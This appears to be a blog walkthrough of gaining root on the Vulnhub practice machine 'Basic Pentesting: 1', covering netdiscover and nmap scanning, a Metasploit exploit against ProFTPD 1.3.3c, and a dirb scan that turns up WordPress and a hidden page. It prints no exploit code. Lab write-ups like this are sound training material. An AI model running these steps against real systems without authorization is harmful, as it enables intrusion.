Gaining Root Privileges Using a Basic Exploit
In this tutorial, I will demonstrate how to gain root access to the virtual machine “Basic Pentesting: 1” from Vulnhub. Link to the VM download can be found here. Special thanks to the author Josiah Pierce for the upload! Please note that this can be done with VMWare or VirtualBox.
Part I: Scanning & Enumeration
After downloading the virtual machine and adding it to my network, I began an ARP scan with netdiscover to see what IP addresses’s were available on the network.
With the netdiscover results, I was able to identify the target machine under the IP address “192.168.141.139”. Now that I had confirmed my target, I ran an nmap scan to determine what services and ports were available.
The nmap results quickly determined that port 21, 22, and 80 were open. I decided to access the webpage hosted on port 80 to see if there would be anything of interest.
With the webpage not providing anything of interest, I began preparing my tools for the next step of attack.
Part II: Gaining Access
Port 21 from the nmap scan determined that ftp service ProFTPD 1.3.3c was running. With this information, I decided to see if any exploits were available on Metasploit.
Bingo! An exploit was found via msfconsole. Now to just configure the options for the exploit.
After configuring my settings, I ran the exploit.
Note: my IP is changed at this time due to having DHCP turned on (host, not target). As you can see, I was able to successfully gain root priveledges.
Part III: Conclusion
Although at first glance when we viewed the http webpage that nmap had picked up and found nothing, this did not necessarily mean that nothing was there. The thing about pentesting is that there are multiple ways of analyzing a system and breaking into it, and this all comes down to the pentester. With constant repetition and practice, you will begin to discover new ways of attack vectors. An example is “dirb”, a web content scanner provided with Kali Linux. After executing dirb https://192.168.141.139 I was able to determine that wordpress was running on the machine and that a hidden page called “secret” was available.
This could potentially lead us on a different path towards breaking into the machine.
I hope you enjoyed the walkthrough, Cheers!